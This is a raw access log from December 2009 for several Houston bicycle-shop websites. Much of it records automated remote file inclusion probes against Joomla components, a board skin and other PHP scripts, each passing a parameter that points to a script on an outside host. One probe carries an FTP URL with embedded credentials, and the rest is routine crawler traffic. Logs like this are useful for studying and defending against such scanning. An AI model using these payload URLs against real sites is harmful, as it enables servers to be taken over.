210.114.220.160 - - [10/Dec/2009:01:39:46 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:01:39:46 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.254 - - [10/Dec/2009:01:40:39 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
67.195.115.254 - - [10/Dec/2009:01:40:40 -0800] "GET /?S=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
70.86.34.18 - - [10/Dec/2009:01:40:46 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.218.169 - - [10/Dec/2009:01:41:09 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.218.169 - - [10/Dec/2009:01:41:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.218.169 - - [10/Dec/2009:01:41:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:01:41:10 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:01:41:10 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:01:41:10 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.34.18 - - [10/Dec/2009:01:41:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.34.18 - - [10/Dec/2009:01:41:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.34.18 - - [10/Dec/2009:01:41:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.124.224.98 - - [10/Dec/2009:01:42:13 -0800] "GET /appserv/main.php?appserv_root=http://amnat.nfe.go.th////kampret/AUTHORS.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.9.108.190 - - [10/Dec/2009:01:43:48 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.218.169 - - [10/Dec/2009:01:45:02 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.34.18 - - [10/Dec/2009:01:45:27 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.218.169 - - [10/Dec/2009:01:45:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.120.218.169 - - [10/Dec/2009:01:45:44 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.120.218.169 - - [10/Dec/2009:01:45:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.86.34.18 - - [10/Dec/2009:01:46:16 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.86.34.18 - - [10/Dec/2009:01:46:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.86.34.18 - - [10/Dec/2009:01:46:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
222.239.255.101 - - [10/Dec/2009:02:04:17 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.239.255.101 - - [10/Dec/2009:02:04:17 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.239.255.101 - - [10/Dec/2009:02:04:17 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
119.63.198.40 - - [10/Dec/2009:02:05:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.svbikes.com"
210.114.220.160 - - [10/Dec/2009:02:07:37 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:02:07:37 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:02:07:37 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:02:12:12 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:02:12:12 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:02:12:12 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.37.196.178 - - [10/Dec/2009:02:25:39 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "bicyclestoreshouston.com"
174.37.196.178 - - [10/Dec/2009:02:25:40 -0800] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "bicyclestoreshouston.com"
174.37.196.178 - - [10/Dec/2009:02:25:40 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "bicyclestoreshouston.com"
64.124.224.98 - - [10/Dec/2009:02:26:39 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://amnat.nfe.go.th////kampret/AUTHORS.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
64.124.224.98 - - [10/Dec/2009:02:26:39 -0800] "GET /logs//appserv/main.php?appserv_root=http://amnat.nfe.go.th////kampret/AUTHORS.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
75.119.205.12 - - [10/Dec/2009:02:59:50 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.119.205.12 - - [10/Dec/2009:02:59:50 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.119.205.12 - - [10/Dec/2009:02:59:50 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.129.119.14 - - [10/Dec/2009:03:00:10 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
119.63.193.75 - - [10/Dec/2009:03:10:14 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
65.55.109.70 - - [10/Dec/2009:03:11:44 -0800] "GET /translations/Finnish.txt HTTP/1.1" 200 32278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)" "www.svbikes.com"
119.63.193.75 - - [10/Dec/2009:03:12:20 -0800] "GET /bullitinboard/viewtopic.php?p=4429 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
200.93.147.154 - - [10/Dec/2009:03:13:15 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:16 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:20 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:41 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:46 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:46 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:55 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:55 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:55 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:55 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:13:55 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:03:14:02 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gatheringcafe.com/administrator/components/com_explore/heheh.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [10/Dec/2009:03:25:50 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.37.114 - - [10/Dec/2009:03:25:50 -0800] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
94.88.104.35 - - [10/Dec/2009:03:55:17 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.88.104.35 - - [10/Dec/2009:03:55:17 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.88.104.35 - - [10/Dec/2009:03:55:17 -0800] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.88.104.35 - - [10/Dec/2009:03:57:09 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.88.104.35 - - [10/Dec/2009:03:57:09 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.88.104.35 - - [10/Dec/2009:03:57:09 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.88.104.35 - - [10/Dec/2009:03:57:13 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [10/Dec/2009:03:58:25 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [10/Dec/2009:03:58:26 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [10/Dec/2009:03:58:26 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [10/Dec/2009:03:58:34 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [10/Dec/2009:03:58:34 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [10/Dec/2009:03:58:34 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.29.247 - - [10/Dec/2009:04:02:07 -0800] "GET /Employeesite/ HTTP/1.1" 401 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
125.160.17.200 - - [10/Dec/2009:04:03:46 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [10/Dec/2009:04:03:47 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [10/Dec/2009:04:03:47 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.88.104.35 - - [10/Dec/2009:04:06:39 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.88.104.35 - - [10/Dec/2009:04:06:39 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [10/Dec/2009:04:10:32 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [10/Dec/2009:04:10:32 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [10/Dec/2009:04:10:41 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [10/Dec/2009:04:19:58 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.111.183 - - [10/Dec/2009:04:20:01 -0800] "GET /bullitinboard/viewtopic.php?p=15577 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.111.183 - - [10/Dec/2009:04:23:21 -0800] "GET /logs/scripts.log HTTP/1.0" 200 64231 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
202.30.198.28 - - [10/Dec/2009:04:24:41 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [10/Dec/2009:04:24:41 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [10/Dec/2009:04:24:41 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.28.220 - - [10/Dec/2009:04:25:50 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.28.220 - - [10/Dec/2009:04:25:50 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.28.220 - - [10/Dec/2009:04:25:50 -0800] "GET /logs/access.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.29.247 - - [10/Dec/2009:04:26:46 -0800] "GET /fit.html HTTP/1.1" 200 17443 "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
190.53.37.10 - - [10/Dec/2009:04:32:03 -0800] "GET /logs/errors.php?error=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.53.37.10 - - [10/Dec/2009:04:32:03 -0800] "GET /errors.php?error=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.53.37.10 - - [10/Dec/2009:04:32:04 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.53.37.10 - - [10/Dec/2009:04:32:05 -0800] "GET /logs/errors.php?error=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.53.37.10 - - [10/Dec/2009:04:32:05 -0800] "GET /errors.php?error=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.53.37.10 - - [10/Dec/2009:04:32:05 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.dwno.or.kr//bbs/data/pds06/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.37.196.178 - - [10/Dec/2009:04:33:43 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "houstonbikeshop.com"
174.37.196.178 - - [10/Dec/2009:04:33:44 -0800] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "houstonbikeshop.com"
174.37.196.178 - - [10/Dec/2009:04:33:44 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:04:36:53 -0800] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gatheringcafe.com/administrator/components/com_explore/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
200.93.147.154 - - [10/Dec/2009:04:36:53 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.gatheringcafe.com/administrator/components/com_explore/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
200.93.147.154 - - [10/Dec/2009:04:36:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gatheringcafe.com/administrator/components/com_explore/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
200.93.147.154 - - [10/Dec/2009:04:36:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gatheringcafe.com/administrator/components/com_explore/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:04:36:56 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gatheringcafe.com/administrator/components/com_explore/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:04:36:58 -0800] "GET /translations/Portuguese_BR.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gatheringcafe.com/administrator/components/com_explore/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.28.220 - - [10/Dec/2009:04:37:47 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.28.220 - - [10/Dec/2009:04:37:47 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.28.220 - - [10/Dec/2009:04:37:47 -0800] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Dec/2009:04:38:41 -0800] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gatheringcafe.com/administrator/components/com_explore/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
